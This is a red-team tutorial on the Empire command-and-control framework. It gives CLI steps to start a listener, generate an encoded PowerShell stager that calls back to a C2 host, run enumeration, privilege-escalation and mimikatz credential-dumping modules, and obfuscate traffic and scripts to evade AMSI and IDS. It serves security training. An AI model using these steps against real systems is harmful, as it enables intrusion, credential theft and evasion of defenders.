Empire: The Automated C2 Framework

[!NOTE] Context: The original “PowerShell Empire” was deprecated in 2019. It was resurrected and is actively maintained by BC Security. This guide focuses on the active BC Security fork (v4/v5+).

In the world of Command and Control (C2), Empire is the AK-47: widely available, reliable, and capable of inflicting massive impact. It builds on the idea that you don’t need to bring your own tools if you can live off the land using PowerShell and Python.

While modern EDRs hunt PowerShell aggressively, Empire’s modular architecture and Python agents (for Linux/macOS) make it a staple in the Red Teamer’s arsenal for training and rapid prototyping.

Architecture: Listeners, Stagers, and Agents

Empire uses a standard C2 topology:

1. Listener: The service waiting on your server (C2) to receive connections. (HTTP, HTTPS, OneDrive, Dropbox).
2. Stager: The initial payload (launcher) executed on the victim. It reaches out to the Listener.
3. Agent: The full session established after the Stager connects.

IronPython?

Empire 5.0 introduced IronPython agents. This allows you to run Python scripts inside the .NET runtime on Windows, largely evading signatures looking for powershell.exe.

Quick Start: The “Star Killer” Era

Empire now supports a GUI called “Starkiller,” but true operators live in the CLI.

1. Installation (Kali/Docker)

The easiest way is Docker.

1
2

docker pull bcsecurity/empire
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire

2. Setting a Listener

This is your receiver.

1
2
3
4
5
6
7

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name http_public
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > set Host http://192.168.1.50
(Empire: listeners/http) > execute
[*] Listener 'http_public' successfully started

3. Generating a Stager

We need a payload to execute on the victim.

1
2
3
4
5

(Empire) > usestager multi/launcher
(Empire: stager/multi/launcher) > set Listener http_public
(Empire: stager/multi/launcher) > generate
[*] Payload generated!
powershell -noP -sta -w 1 -enc SQBm...

4. Post-Exploitation Modules

Once you have an Agent (check via agents), the fun begins. Empire has hundreds of built-in modules.

Situational Awareness:

1
2
3

usemodule powershell/situational_awareness/network/powerview/get_domain_user
set Agent <AgentID>
execute

Privilege Escalation:

1
2

usemodule powershell/privesc/powerup/allchecks
execute

Credential Dumping:

1

usemodule powershell/credentials/mimikatz/logonpasswords

Evasion and Malleable Profiles

Out-of-the-box Empire traffic looks like… Empire traffic. It’s flagged immediately by IDS (Snort/Suricata). To survive, you must customize the traffic profile.

Malleable C2 (a concept borrowed from Cobalt Strike) allows you to reshape your HTTP traffic.

• User-Agent: Impersonate Chrome, Firefox, or a Windows Update Agent.
• Jitter: Introduce randomness in check-in times (e.g., check in every 60s +/- 30%).
• Staging Key: Randomized keys for encrypting the initial stage.

The Irony of Success

Empire’s biggest weakness is its popularity.

• AMSI (Antimalware Scan Interface): Windows Defender scans PowerShell scripts in memory. Empire scripts are heavily fingerprinted.
• Keyword Detection: Strings like Invoke-Empire, Get-Keystrokes, and ReflectivePEInjection are triggers.

Countermeasures:

1. Obfuscation: Empire has built-in obfuscation (Token manipulation, variable randomization). Enable it globally.
2. Don’t use Default Strings: Modify the source of the modules before loading them.
3. Use C# / IronPython: Shift away from pure PowerShell where possible.

Conclusion

Empire taught a generation of Red Teamers the power of “Living off the Land.” Even if you move on to sophisticated tools like Cobalt Strike or Sliver, understanding Empire’s workflow—Listeners, Stagers, Agents, and Modules—is understanding the fundamental loop of adversarial operations.

UncleSp1d3r